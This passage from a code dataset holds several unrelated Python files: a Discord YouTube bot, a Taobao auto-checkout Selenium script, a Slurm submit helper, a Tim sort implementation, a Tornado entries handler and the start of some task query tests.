messages.\\n\\n\"\n # msg += \"! 1.2\\n--- Added video title and uploader when displaying video result, for when embeds are turned off.\\n\\n\"\n # msg += \"! 1.1\\n--- Moved to the official YouTube search API\\n\\n\"\n # msg += \"! 1.0\\n--- Initial release.```\\n\"\n msg += \"For more info, ask for @\\U0000200BFrancis#6565 on this server: https://discord.gg/yp8WpMh\"\n await bot.say(msg)\n comm_count += 1\n\n@bot.command(pass_context=True)\nasync def cooldowns(ctx):\n msg = \"__Command cooldowns:__\\n\\n\"\n msg += \"Search: 5/60s per server\\n\"\n msg += \"Channel: 5/60s per server\\n\"\n msg += \"Version: 1/60s per server\\n\"\n msg += \"Info: 1/60s per server\\n\"\n if ctx.message.server.id == '143686242687647745':\n msg += \"Now playing: 30/600s\\n\"\n msg += \"Stats: 1/300s per server\"\n await bot.say(msg)\n comm_count += 1\n\n@bot.command()\n@commands.cooldown(1, 60, commands.BucketType.server)\nasync def info():\n \"\"\"Shows some info about this boat.\"\"\"\n msg = \"Hi there! I'm __**YouTube**__, a bot made by **@\\U0000200BFrancis#6565**.\\n\\n\"\n msg += \"I'm made in Python using the `discord.py` library, and I'm here to interact with **YouTube via Discord**, so you don't have to.\\n\\n\"\n msg += \"__**What can I do?**__\\n\\n\"\n msg += \"- I can search YouTube for a video.\\n- I can search YouTube for a channel.\\n- I *can* do other stuff... But it's in testing!\\n\\nFor more info, join the YouTube help server (https://discord.gg/yp8WpMh) and ask for @\\U0000200BFrancis#6565.\"\n await bot.say(msg)\n comm_count += 1\n\n# ------------------------------------------------------------------------------------------------------------ # \n# ____ _ _ _____ __ __ ____ _ __ __ #\n# | _ \\ (_) ___ ___ ___ _ __ __| | | ___| | \\/ | / ___| | |_ _ _ / _| / _| #\n# | | | | | | / __| / __| / _ \\ | '__| / _` | | |_ | |\\/| | \\___ \\ | __| | | | | | |_ | |_ #\n# | |_| | | | \\__ \\ | (__ | (_) | | | | (_| | _ | _| | | | | ___) | | |_ | |_| | | _| | _| #\n# |____/ |_| |___/ \\___| \\___/ |_| \\__,_| (_) |_| |_| |_| |____/ \\__| \\__,_| |_| |_| #\n# ------------------------------------------------------------------------------------------------------------ # \n\n\n@bot.command(aliases=[\"np\"], no_pm=True, pass_context=True, hidden=True)\n@commands.cooldown(30, 600, commands.BucketType.server)\nasync def nowplaying(ctx):\n \"\"\"Show the currently playing song on Discord.FM. Only works there.\"\"\"\n if ctx.message.server.id == '143686242687647745':\n channel = ctx.message.channel\n if (channel.id == '197142982686670848') or (channel.id == '143734628849549312'):\n await bot.say('Silly you. I can\\'t get the URL of the song playing here!')\n else:\n try:\n url = 'https://temp.discord.fm/libraries/{}/queue'.format(channel)\n async with aiohttp.get(url) as r:\n data = await r.json()\n song = data['current']\n if song['service'] == 'YouTubeVideo':\n vid = song['identifier']\n await bot.say('\\N{BLACK RIGHT-POINTING TRIANGLE} Currently playing in __{}__: https://youtube.com/watch?v={}'.format(channel, vid))\n elif song['service'] == 'SoundCloudTrack':\n track = song['identifier']\n await bot.say('\\N{BLACK RIGHT-POINTING TRIANGLE} Currently playing in __{}__: https://soundcloud.com/{}'.format(channel, track))\n except:\n await bot.say('Could not get Now Playing data or this is a new service. \\N{EYES}')\n logger.exception('New Discord FM service found?')\n else:\n await bot.say(\"This isn't Discord.FM! \")\n comm_count += 1\n\n# @bot.command(pass_context=True, aliases=[\"l\"])\n# @commands.cooldown(5, 60, commands.BucketType.channel)\n# async def lookup(ctx):\n# \"\"\"Searches the DFM library for the song, and checks if it exists.\"\"\"\n# try:\n# await bot.send_typing(ctx.message.channel)\n# if len(ctx.message.content.split(' ', 2)) == 2:\n# msg = \"Arguments needed!\\n\\nExample: `yt lookup Darude Sandstorm`\"\n# else:\n# youtube = build(\"youtube\", \"v3\", developerKey=key)\n# search_response = youtube.search().list(q=ctx.message.content.split(' ', 2)[2],part=\"id,snippet\",maxResults=1,type=\"video\").execute()\n# if len(search_response.get('items')) == 0:\n# msg = \"No videos found.\"\n# else:\n# vidid = search_response.get('items')[0]['id']['videoId']\n# vidurl = \"https://www.youtube.com/watch?v=\" + vidid\n# yt_url = \"http://www.youtube.com/oembed?url={0}&format=json\".format(vidurl)\n# metadata = await get_json(yt_url)\n# title = metadata['title']\n# try:\n# url = \"https://temp.discord.fm/requests/json\"\n# async with aiohttp.get(url) as r:\n# resp = await r.json()\n# i = 0\n# for title in resp[1]:\n# lib = resp[1]\n# if title in resp[i][2]['title']:\n# await bot.say(\"{} exists in the Discord.FM database for the library {}!\".format(title, lib))\n# break\n# else:\n# i += 1\n# else:\n# await bot.say(\"That song doesn't exist in the Discord.FM database, or YouTube returned an incorrect title... ¯\\_(ツ)_/¯\")\n# except:\n# await bot.say(\"Error.\")\n# except Exception as e:\n# message = 'The bass kicked too hard... :eyes: `{}` This has been reported to the creator.'.format(e)\n# logger.exception(e)\n# await bot.say(message)\n# owner = discord.utils.get(bot.get_all_members(), id='116079569349378049')\n# await bot.send_message(owner, 'Server: {}\\n\\nError in command `lookup`: {}\\n\\n'.format(ctx.message.server, e))\n\n# -------------------------------------------------------------------------------------------------------------------------------------------------------- #\n# ____ _ _ __ __ __ _____ _ ____ _ __ __ #\n# / ___| | |_ __ _ _ __ | |_ ___ / _| \\ \\ / / ___ _ _ |_ _| _ _ | |__ ___ / ___| | |_ _ _ / _| / _| #\n# \\___ \\ | __| / _` | | '__| | __| / _ \\ | |_ \\ V / / _ \\ | | | | | | | | | | | '_ \\ / _ \\ \\___ \\ | __| | | | | | |_ | |_ #\n# ___) | | |_ | (_| | | | | |_ | (_) | | _| | | | (_) | | |_| | | | | |_| | | |_) | | __/ ___) | | |_ | |_| | | _| | _| #\n# |____/ \\__| \\__,_| |_| \\__| \\___/ |_| |_| \\___/ \\__,_| |_| \\__,_| |_.__/ \\___| |____/ \\__| \\__,_| |_| |_| #\n# -------------------------------------------------------------------------------------------------------------------------------------------------------- # \n\n@bot.command(pass_context=True, aliases=[\"s\"])\n@commands.cooldown(5, 60, commands.BucketType.channel)\nasync def search(ctx):\n \"\"\"Searches YouTube for a video. \n\n Returns the first result.\"\"\"\n try:\n await bot.send_typing(ctx.message.channel)\n if len(ctx.message.content.split(' ', 2)) == 2:\n msg = \"Arguments needed!\\n\\nExample: `yt search Darude Sandstorm`\"\n else:\n youtube = build(\"youtube\", \"v3\", developerKey=key)\n search_response = youtube.search().list(q=ctx.message.content.split(' ', 2)[2],part=\"id,snippet\",maxResults=1,type=\"video\").execute()\n if len(search_response.get('items')) == 0:\n msg = \"No videos found.\"\n else:\n vidid = search_response.get('items')[0]['id']['videoId']\n vidurl = \"https://www.youtube.com/watch?v=\" + vidid\n yt_url = \"http://www.youtube.com/oembed?url={0}&format=json\".format(vidurl)\n metadata = await get_json(yt_url)\n msg = '**Title:** _{}_\\n**Uploader:** _{}_\\n\\n<{}>'.format(metadata['title'], metadata['author_name'], vidurl)\n await bot.say(msg)\n except Exception as e:\n message = 'The bass kicked too hard... :eyes: `{}` This has been reported.'.format(e)\n logger.exception(e)\n await bot.say(message)\n owner = discord.utils.get(bot.get_all_members(), id='116079569349378049')\n await bot.send_message(owner, 'Server: {}\\n\\nError in command `search` from id `{}`: {}\\n\\n'.format(ctx.message.server, vidid, e))\n comm_count += 1\n\n@bot.command(pass_context=True, aliases=[\"c\"])\n@commands.cooldown(5, 60, commands.BucketType.channel)\nasync def channel(ctx):\n \"\"\"Searches YouTube for a channel. \n\n Returns the first result.\"\"\"\n try:\n await bot.send_typing(ctx.message.channel)\n if len(ctx.message.content.split(' ', 2)) == 2:\n msg = \"Arguments needed!\\n\\nExample: `yt channel TrapNation`\"\n else:\n youtube = build(\"youtube\", \"v3\", developerKey=key)\n search_response = youtube.search().list(q=ctx.message.content.split(' ', 2)[2],part=\"id,snippet\",maxResults=1,type=\"channel\").execute()\n if len(search_response.get('items')) == 0:\n msg = \"No channels found.\"\n else:\n chanid = search_response.get('items')[0]['id']['channelId']\n data = youtube.channels().list(part='statistics,snippet', id=chanid).execute()\n subs = str(data['items'][0]['statistics']['subscriberCount'])\n name = str(data['items'][0]['snippet']['title'])\n img = str(data['items'][0]['snippet']['thumbnails']['default']['url'])\n chanurl = \"https://www.youtube.com/channel/\" + chanid\n msg = '**Channel:** {}\\n**Subscribers:** {}\\n<{}>\\n\\n**Thumbnail:** {}'.format(name, subs, chanurl, img)\n await bot.say(msg)\n except Exception as e:\n message = 'Soooo... YouTube returned a video, but there was no data for it. ¯\\_(ツ)_/¯ :eyes: `{}` This has been reported to the creator.'.format(e)\n logger.exception(e)\n await bot.say(message)\n comm_count += 1\n\n@bot.command(pass_context=True, aliases=['st'])\n@commands.cooldown(5, 60, commands.BucketType.channel)\nasync def stats(ctx):\n \"\"\"Reverse lookup for youtube videos. Returns statistics and stuff\"\"\"\n try:\n await bot.send_typing(ctx.message.channel)\n if len(ctx.message.content.split(' ', 2)) == 2:\n msg = \"Arguments needed!\\n\\nExample: `yt stats https://www.youtube.com/watch?v=dQw4w9WgXcQ`\"\n else:\n url = re.compile(r'http(?:s?):\\/\\/(?:www\\.)?youtu(?:be\\.com\\/watch\\?v=|\\.be\\/)([\\w\\-\\_]*)(&(amp;)?‌​[\\w\\?‌​=]*)?')\n shorturl = re.compile(r'http(?:s?):\\/\\/?youtu(?:\\.be\\/)([\\w\\-\\_]*)(&(amp;)?‌​[\\w\\?‌​=]*)?')\n q=ctx.message.content.split(' ', 2)[2]\n match = re.search(url, q)\n if match:\n match2 = re.search(shorturl, q)\n if match2:\n a = match2.group(1)\n q = 'https://www.youtube.com/watch?v={}'.format(a)\n vid_url = \"http://www.youtube.com/oembed?url={0}&format=json\".format(q)\n metadata = await get_json(vid_url)\n msg = '**Title:** _{}_\\n**Uploader:** _{}_\\n\\n<{}>'.format(metadata['title'], metadata['author_name'], q)\n await bot.say(msg)\n except Exception as e:\n message = 'The bass kicked too hard... :eyes: `{}` (Probably not allowed to get info for the video...) This has been reported.'.format(e)\n logger.exception(e)\n await bot.say(message)\n owner = discord.utils.get(bot.get_all_members(), id='116079569349378049')\n await bot.send_message(owner, 'Server: {}\\n\\nError in command `stats` from id `{}`: {}\\n\\n'.format(ctx.message.server, q, e))\n comm_count += 1\n\n\nasync def get_json(yt_url):\n \"\"\"\n Returns the JSON from an URL.\n Expects the url to be valid and return a JSON object.\n \"\"\"\n async with aiohttp.get(yt_url) as r:\n result = await r.json()\n return result\n\n# ----------------------------------------------------------------------------------------------------------------------------------------------- #\n# _____ _ __ __ __ _____ _ ____ _ __ __ #\n# | ____| _ __ __| | ___ / _| \\ \\ / / ___ _ _ |_ _| _ _ | |__ ___ / ___| | |_ _ _ / _| / _| #\n# | _| | '_ \\ / _` | / _ \\ | |_ \\ V / / _ \\ | | | | | | | | | | | '_ \\ / _ \\ \\___ \\ | __| | | | | | |_ | |_ #\n# | |___ | | | | | (_| | | (_) | | _| | | | (_) | | |_| | | | | |_| | | |_) | | __/ ___) | | |_ | |_| | | _| | _| #\n# |_____| |_| |_| \\__,_| \\___/ |_| |_| \\___/ \\__,_| |_| \\__,_| |_.__/ \\___| |____/ \\__| \\__,_| |_| |_| #\n# ----------------------------------------------------------------------------------------------------------------------------------------------- #\n\n@bot.command(no_pm=True, hidden=True)\n@commands.cooldown(1, 40, commands.BucketType.server)\nasync def ping():\n \"\"\"Pong!\"\"\"\n choices = [\"I'm alive...\", \"What do you want?\", \"Can't you see I'm sleeping here?\", \"Ugh. Is it Monday again?\", \"Time to remember the most important person here.\", \"You still suck.\", \"What's your name?\"]\n await bot.say(randchoice(choices))\n comm_count += 1\n\n@bot.command(hidden=True, aliases=['bs'])\n@commands.cooldown(1, 300, commands.BucketType.server)\nasync def botstats():\n \"\"\"Statistics about the bot\"\"\"\n users = str(len([m for m in set(bot.get_all_members())]))\n msg = \"Servers: {}\".format(len(list(bot.servers)))\n msg += \"\\nUsers: {}\".format(users)\n # msg += \"\\n{} high quality videos searched.\".format(search_count)\n # msg += \"\\n{} channels searched.\".format(channel_count)\n up = abs(bot.uptime - int(time.perf_counter()))\n up = str(datetime.timedelta(seconds=up))\n msg += \"\\nShard Uptime: {}\".format(up)\n msg += \"\\nCommands since boot: {}\".format(comm_count)\n await bot.say(msg)\n comm_count += 1\n\n@bot.command(pass_context=True, hidden=True)\nasync def name(ctx, *, name):\n \"\"\"Sets the bot's name\"\"\"\n if ctx.message.author.id == '116079569349378049':\n name = name.strip()\n if name != \"\":\n await bot.edit_profile(username=name)\n await bot.say(\"Done.\")\n\n\n@bot.command(pass_context=True, hidden=True)\nasync def status(ctx, *, status=None):\n \"\"\"Sets the bot's status\n\n Leaving this empty will clear it. OWNER ONLY\"\"\"\n if ctx.message.author.id == '116079569349378049':\n if status:\n status = status.strip()\n await bot.change_status(discord.Game(name=status))\n else:\n await bot.change_status(None)\n await bot.say(\"Done.\")\n\n@bot.command(hidden=True)\nasync def avatar(url):\n \"\"\"Sets the bot's avatar\n\n OWNER ONLY\"\"\"\n if ctx.message.author.id == '116079569349378049':\n async with bot.http.session.get(url) as r:\n data = await r.read()\n await bot.edit_profile(avatar=data)\n await bot.say(\"Done.\")\n\n@bot.command()\nasync def join():\n \"\"\"Provides an OAuth link used to add the bot to the server.\"\"\"\n msg = (\"Use this link to add me to your server! Requires the `manage server` permission. https://is.gd/ytdiscord\")\n await bot.say(msg)\n\n@bot.command(name=\"shutdown\", aliases=[\"sd\"], no_pm=True, pass_context=True, hidden=True)\nasync def shutdown(ctx):\n \"\"\"Stops the bot.\"\"\"\n if ctx.message.author.id == '116079569349378049':\n await bot.say('Shutting down...')\n session.close()\n await bot.logout()\n\n@bot.command(aliases=[\"gp\"], hidden=True, pass_context=True)\nasync def update(ctx):\n if ctx.message.author.id == '116079569349378049':\n g = git.cmd.Git('/home/fishyfing/youtubebot')\n try:\n g.pull()\n await bot.say('Successfully updated.')\n except:\n await bot.say('Stashing changes...')\n g.stash()\n g.pull()\n await bot.say('Successfully updated...')\n\ndef main():\n set_logger()\n try:\n yield from bot.login('') #gitignore\n #login here\n except TypeError as e:\n logger.warning(e)\n msg = (\"\\nYou are using an outdated discord.py.\\n\"\n \"update your discord.py with by running this in your cmd \"\n \"prompt/terminal.\\npip3 install --upgrade git+https://\"\n \"github.com/Rapptz/discord.py@async\")\n sys.exit(msg)\n yield from bot.connect()\n\nif __name__ == '__main__':\n loop = asyncio.get_event_loop()\n try:\n loop.run_until_complete(main())\n except discord.LoginFailure:\n logger.error(traceback.format_exc())\n except:\n logger.error(traceback.format_exc())\n loop.run_until_complete(bot.logout())\n finally:\n loop.close()","sub_path":"youtubebot.py","file_name":"youtubebot.py","file_ext":"py","file_size_in_byte":23832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"113104016","text":"from flask import Flask\nfrom blueprint import blueprints\n\nclass Framework (object):\n\n def __init__(self,debug, server, port, setup_list):\n self.setup_list = setup_list\n self.app = Flask(__name__)\n self.app.register_blueprint(blueprints)\n self.app.run(debug=debug,host=server,port=port)\n self.setup_list = setup_list\n","sub_path":"backend/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"186841206","text":"from selenium import webdriver\nimport datetime\nimport time\n\n# BUY_TIME = \"2021-3-5 17:50:30\"\nBUY_TIME = input()\nMAX_LOGIN_RETRY_TIMES = 6\ncurrent_retry_login_times = 0\nlogin_success = False\nbuy_time_object = datetime.datetime.strptime(BUY_TIME, '%Y-%m-%d %H:%M:%S')\n\nnow_time = datetime.datetime.now()\nif now_time > buy_time_object:\n print(\"The time has passed\")\n exit(0)\n\nprint(\"open chrome\")\n\noption = webdriver.ChromeOptions()\noption.add_argument('disable-infobars')\noption.add_argument('--blink-settings=imagesEnabled=false')\ndriver = webdriver.Chrome(chrome_options=option)\ndriver.maximize_window()\nprint(\"chrome has been opened\")\n\n\ndef __login_operates():\n driver.get(\"https://www.taobao.com\")\n # noinspection PyBroadException\n try:\n if driver.find_element_by_link_text(\"login\"):\n driver.find_element_by_link_text(\"login\").click()\n time.sleep(10)\n except:\n global login_success\n global current_retry_login_times\n login_success = True\n current_retry_login_times = 0\n\ndef login():\n print(\"login\")\n __login_operates()\n global current_retry_login_times\n while current_retry_login_times < MAX_LOGIN_RETRY_TIMES:\n current_retry_login_times = current_retry_login_times + 1\n print(\"login times:\" + str(current_retry_login_times))\n __login_operates()\n if login_success:\n print(\"successfully\")\n break\n else:\n print(\"wait for login\")\n\n if not login_success:\n exit(0)\n\n now = datetime.datetime.now()\n print('login success:', now.strftime('%Y-%m-%d %H:%M:%S'))\n\ndef __refresh_keep_alive():\n driver.get(\"https://cart.taobao.com/cart.htm\")\n print(\"refresh\")\n time.sleep(60)\n\n\ndef keep_login_and_wait():\n print(\"long time before the time, start refreshing\")\n while True:\n currentTime = datetime.datetime.now()\n if (buy_time_object - currentTime).seconds > 300:\n __refresh_keep_alive()\n else:\n print(\"stop refreshing\")\n break\n\ndef buy():\n driver.get(\"https://cart.taobao.com/cart.htm\")\n time.sleep(1)\n while True:\n # noinspection PyBroadException\n try:\n # if driver.find_element_by_id(\"J_SelectAll2\"):\n driver.find_element_by_id(\"J_SelectAll1\").click()\n print(\"choose all goods\")\n break\n except:\n print(\"No\")\n submit_succ = False\n retry_submit_times = 0\n while True:\n now = datetime.datetime.now()\n if now >= buy_time_object:\n start = time.clock()\n print(\"buy times:\" + str(retry_submit_times))\n if submit_succ:\n print(\"submit order\")\n break\n if retry_submit_times > 100:\n print(\"give up trying\")\n break\n\n retry_submit_times = retry_submit_times + 1\n\n try:\n if driver.find_element_by_id(\"J_Go\"):\n driver.find_element_by_id(\"J_Go\").click()\n click_submit_times = 0\n while True:\n # noinspection PyBroadException\n try:\n if click_submit_times < 10:\n driver.find_element_by_link_text('提交订单').click()\n end = time.clock()\n print(\"click submit button\")\n print(end-start)\n submit_succ = True\n break\n else:\n print(\"submit failure\")\n except Exception as ee:\n print(ee)\n print(\"retry\")\n click_submit_times = click_submit_times + 1\n time.sleep(0.1)\n except Exception as e:\n print(e)\n # print(\"submit failure\")\n\n time.sleep(0.1)\n\n\nlogin()\nkeep_login_and_wait()\nbuy()\n","sub_path":"Taobao-AutoBuy.py","file_name":"Taobao-AutoBuy.py","file_ext":"py","file_size_in_byte":4089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"158434387","text":"#!/usr/bin/env python3\n'''\nsubmit slurn jobs from snakemake, cp slurm cluster config into bash scripts\n\nCreated on 2019-03-25\n\n@author: Meghan Correa \n@copyright: 2019 The Presidents and Fellows of Harvard College. All rights reserved.\n@license: GPL v2.0\n'''\n\nimport os\nimport sys\nimport shutil\nfrom collections import OrderedDict\n\nfrom snakemake.utils import read_job_properties\n\njobscript = sys.argv[1]\njob_props = read_job_properties(jobscript)\n\n# uncomment out to write jobscript to script folder\n#shutil.copyfile(jobscript, (job_props['input'][0] + '_jobscript'))\n\n# the input file is a bash script to submit to slurm, read cmd in\nwith open(job_props['input'][0], 'r') as fh:\n cmd = fh.readlines()\n\nprefix = []\ncli_opts = []\n# get slurm opts as a prefix for cmd\nfor prop, val in job_props['cluster'].items():\n sbatch_val = ''\n if val != '':\n sbatch_val = '=%s' % val\n prefix.append('#SBATCH --%s%s\\n' % (prop, sbatch_val))\n cli_opts.append('--%s%s' % (prop, sbatch_val))\n\n# write new prefixed cmd to the file\nnew_cmd = [cmd[0]] + prefix + cmd[1:]\nwith open(job_props['input'][0], 'w') as fh:\n for l in new_cmd:\n fh.write(l)\n\n\ncli_opt_str = ' '.join(cli_opts)\n\nos.system(\"sbatch {cli_opts} {script}\".format(cli_opts=cli_opt_str, script=jobscript))\n","sub_path":"odybcl2fastq/profiles/rc_slurm/slurm_submit.py","file_name":"slurm_submit.py","file_ext":"py","file_size_in_byte":1315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"392985768","text":"# arr=[8, 5, 3, 7, 9, 3, 4, 12, 2, 6]\n#\n# step = 4\n# for(i = 0, i < n; i = i+step;\n# insertionSort(arr,i,min(i+step,n-1)\n#\n#\n# insertionSort(arr, l,h)\n#\n\n# [8, 5, 3, 7, 9\n#\ndef swap(arr, a, b):\n t = arr[a]\n arr[a] = arr[b]\n arr[b] = t\n\n\ndef insertion_sort(arr, low, high):\n for i in range(low + 1, high + 1):\n\n run = i\n while run - 1 >= low and arr[run] < arr[run - 1]:\n swap(arr, run, run - 1)\n run -= 1\n\n\ndef merge(arr, start1, start2):\n t = start1\n seg = start2 - start1\n end1 = start2 - 1\n end2 = min(start2 + seg - 1, len(arr) - 1)\n\n res = []\n i = 0\n while start1 <= end1 or start2 <= end2:\n\n if start1 <= end1 and start2 <= end2:\n if arr[start1] <= arr[start2]:\n\n res.append(arr[start1])\n i += 1\n start1 += 1\n else:\n res.append(arr[start2])\n i += 1\n start2 += 1\n elif start1 <= end1:\n res.append(arr[start1])\n i += 1\n start1 += 1\n else:\n res.append(arr[start2])\n i += 1\n start2 += 1\n\n for i in range(len(res)):\n arr[t] = res[i]\n t += 1\n\n\nRUN = 3\n\n\ndef tim_sort(arr):\n n = len(arr)\n i = 0\n while i < n:\n h = min(i + RUN - 1, n - 1)\n insertion_sort(arr, i, h)\n i = i + RUN\n\n size = RUN\n while size < n:\n\n left = 0;\n while left < n:\n # right = min(left + size - 1, n - 1)\n mid = left + size\n merge(arr, left, mid)\n left += 2 * size\n\n size = size * 2\n\n\narr = [8, 5, 3, 7, 9, 3, 4, 12, 6, 2]\ntim_sort(arr)\nprint(str(arr))\n","sub_path":"src/algos/sorting/quick_sort/tim_sort.py","file_name":"tim_sort.py","file_ext":"py","file_size_in_byte":1712,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"477355336","text":"\"\"\"Do moses tok detok.\"\"\"\n# pylint: disable=invalid-name, unused-import\n\nimport sys\n\ntry:\n import sacremoses # noqa: F401\nexcept ModuleNotFoundError:\n import subprocess as sp\n import shlex\n proc = sp.Popen(\n shlex.split('pip install sacremoses'), stdout=-1, stderr=-1)\n out, err = proc.communicate()\n if err:\n sys.stderr.write('error: %s' % err.decode())\n sys.stdout.write('%s' % out.decode())\n\nfrom sacremoses import MosesTokenizer, MosesDetokenizer\n\nMTOK = MosesTokenizer().tokenize\nMDETOK = MosesDetokenizer().detokenize\nmtok = MTOK\nmdetok = MDETOK\n","sub_path":"freemt_utils/mtok.py","file_name":"mtok.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"417197640","text":"#!/usr/bin/env python\n\nimport tornado.ioloop\nimport tornado.web\nfrom tornado.escape import json_decode, url_unescape\nfrom form import FormHandler, allquestions\nfrom tornadoadfsoauth2.auth import AuthHandler\nfrom tornadoadfsoauth2.session import sessions\nimport sys, json\nfrom base import BaseHandler\nimport templates\nfrom db import db\nimport aux\nimport logging\n\nclass EntriesHandler(BaseHandler):\n @tornado.web.authenticated\n def get(self, company, path, args):\n company = url_unescape(company)\n project = self.get_query_argument('project', None)\n asjson = True if self.get_query_argument('format', None) == 'json' else False\n modify = True if self.get_query_argument('modify', None) == 'true' else False\n domain = self.get_query_argument('domain', None)\n if self.is_user_admin():\n modify = True\n # no args - list projects\n if not project and not asjson:\n self.write(templates.start)\n self.render_header()\n if not domain:\n self.write(\"

Business units

\\n\")\n self.write('

')\n for x in db.list_domains(path, company):\n self.write('%s\\n'%(company,path,x,x))\n self.write('

\\n')\n self.write(\"

Projects

\\n\")\n else:\n self.write(\"

Projects for %s

\\n\"%domain)\n for x in db.list_projects(path, company, domain):\n self.write('

%s (%s)

\\n'%(x[0],x[0], x[1]))\n self.write('

Raw data\\n')\n statspath = '/%s/'%company + path.split('/')[0] + '/stats/'\n self.write('-- Statistics\\n' % (statspath))\n planningpath = '/' + path.split('/')[0] + '/planning/'\n self.write('-- Planning

\\n' % (planningpath))\n self.write(templates.end)\n elif asjson:\n if project: # all scores for a project\n self.write({'scores':db.entries_by_project(path, company, project),\n 'questions': allquestions(path)})\n else: # latest scores for each project\n d = []\n for p in db.list_projects(path, company):\n d.append(db.entries_by_project(path, company, p[0])) # db orders by date desc\n self.write({'latest_scores':d, 'questions': allquestions(path)})\n else:\n r = ''\n self.write(templates.start)\n self.render_header()\n r = ''\n r += '

Entries for project %s

\\n'%project\n r += '\\n'\n columns = ['Date','Answered', 'Risk level', 'Score', 'Submitted by']\n if modify:\n columns = ['Date','Answered','Risk level','Score', 'Submitted by' ,'', '']\n # kludge to only show risk level for ssa\n if not path in ['ssa', 'satsi'] and 'Risk level' in columns:\n columns.remove('Risk level')\n for x in columns:\n r += '\\n'%x\n r += '\\n'\n for e in db.entries_by_project(path, company, project):\n r += '\\n'\n r += '\\n'%(e['score']['answer_count'], e['score']['answer_count'] + e['score']['unanswered'])\n if 'Risk level' in columns:\n try:\n r += '\\n'%(e['score']['risk_level'])\n except:\n r += '\\n'\n logging.debug(str(e['score']))\n logging.debug(json.dumps(e['score'], indent=4))\n r += '\\n'%(e['score']['score'])\n r += '\\n'%(e['submitter'])\n if modify:\n r += '\\n'\n r += '
%s
%s\\n'%(company, path, e['id'], aux.unixtime2date(e['date']))\n r += '%d / %d%sn/a%s%sModify\\n'%(company, path, e['id'])\n r += 'Delete\\n'%(company, path, e['id'])\n r += '
\\n'\n r += '

Raw data

\\n'%(project)\n self.write(r)\n self.write(templates.end)\n \n","sub_path":"web/entries.py","file_name":"entries.py","file_ext":"py","file_size_in_byte":4495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"461772931","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Feb 10 12:05:15 2016\r\n@author: Max\r\nFrom Matlab\r\nModified, Gerald Schuller, July 2016\r\n\"\"\"\r\nimport numpy as np\r\ndef polyphase2x(xp):\r\n\t\"\"\"Converts polyphase input signal xp (a row vector) into a contiguos row vector\r\n\tFor block length N, for 3D polyphase representation (exponents of z in the third \r\n\tmatrix/tensor dimension)\"\"\"\r\n\t#Number of blocks in the signal\r\n\t[r,N,L] = np.shape(xp);\r\n\tx = np.zeros((1,N*L));\r\n\tfor m in range(L):\r\n\t x[0,m*N+np.arange(N)]=xp[0,:,m]\r\n\treturn x\r\n\r\n","sub_path":"Seminar5/polyphase2x.py","file_name":"polyphase2x.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"47320165","text":"# Quick sort\n# This is a divide and conquer algorithm\n# Quick sort first divides a large array into two smaller sub-arrays: the low elements and the high elements.\n# Quick sort can then recursively sort the sub-arrays.\n# O(n^2) for worst case, O(n log n) average\n\n\ndef quick_sort(sequence):\n if len(sequence) <= 1:\n return sequence\n lo, pi, hi = partition(sequence)\n return quick_sort(lo) + [pi] + quick_sort(hi)\n\n\ndef partition(sequence):\n pi, sequence = sequence[0], sequence[1:]\n lo = [x for x in sequence if x <= pi]\n hi = [x for x in sequence if x > pi]\n return lo, pi, hi\n","sub_path":"sorting/quick_sort.py","file_name":"quick_sort.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"4192486","text":"from ftw.builder import Builder\nfrom ftw.builder import create\nfrom opengever.base.oguid import Oguid\nfrom opengever.globalindex.model.task import Task\nfrom opengever.ogds.base.utils import get_current_admin_unit\nfrom opengever.testing import IntegrationTestCase\nfrom opengever.testing import obj2brain\nfrom sqlalchemy.orm.exc import NoResultFound\nfrom zope.app.intid.interfaces import IIntIds\nfrom zope.component import getUtility\n\n\nclass TestTaskQueries(IntegrationTestCase):\n\n def test_in_pending_state_returns_only_pending_tasks(self):\n self.login(self.regular_user)\n\n pending_tasks = Task.query.in_pending_state().all()\n\n self.assertIn(self.task.get_sql_object(), pending_tasks)\n self.assertIn(self.subtask.get_sql_object(), pending_tasks)\n self.assertIn(self.task.get_sql_object(), pending_tasks)\n\n self.assertNotIn(self.seq_subtask_2.get_sql_object(), pending_tasks)\n\n def test_users_tasks_lists_only_tasks_assigned_to_current_user(self):\n self.login(self.regular_user)\n\n self.assertItemsEqual(\n [self.meeting_task.get_sql_object(),\n self.meeting_subtask.get_sql_object()],\n Task.query.users_tasks(self.dossier_responsible.id).all())\n\n def test_issued_task_lists_only_task_issued_by_the_current_user(self):\n self.login(self.regular_user)\n\n self.assertItemsEqual(\n [self.sequential_task.get_sql_object()],\n Task.query.users_issued_tasks(self.regular_user.id).all())\n\n self.assertItemsEqual(\n [self.seq_subtask_1.get_sql_object(),\n self.seq_subtask_2.get_sql_object()],\n Task.query.users_issued_tasks(self.secretariat_user.id).all())\n\n def test_by_intid_with_existing_pair(self):\n self.login(self.regular_user)\n\n intid = getUtility(IIntIds).getId(self.task)\n self.assertEquals(self.task.get_sql_object(),\n Task.query.by_intid(intid, 'plone'))\n\n def test_by_intid_with_NOT_existing_pair_returns_none(self):\n self.login(self.regular_user)\n self.assertIsNone(None, Task.query.by_intid(1, 'bd'))\n\n def test_task_by_oguid_returns_correct_task_with_oguid_instance_param(self):\n self.login(self.regular_user)\n\n oguid = Oguid.for_object(self.task)\n self.assertEqual(self.task.get_sql_object(), Task.query.by_oguid(oguid))\n\n def test_task_by_oguid_returns_correct_task_with_string_param(self):\n self.login(self.regular_user)\n\n oguid = Oguid.for_object(self.task)\n self.assertEqual(self.task.get_sql_object(), Task.query.by_oguid(oguid.id))\n\n def 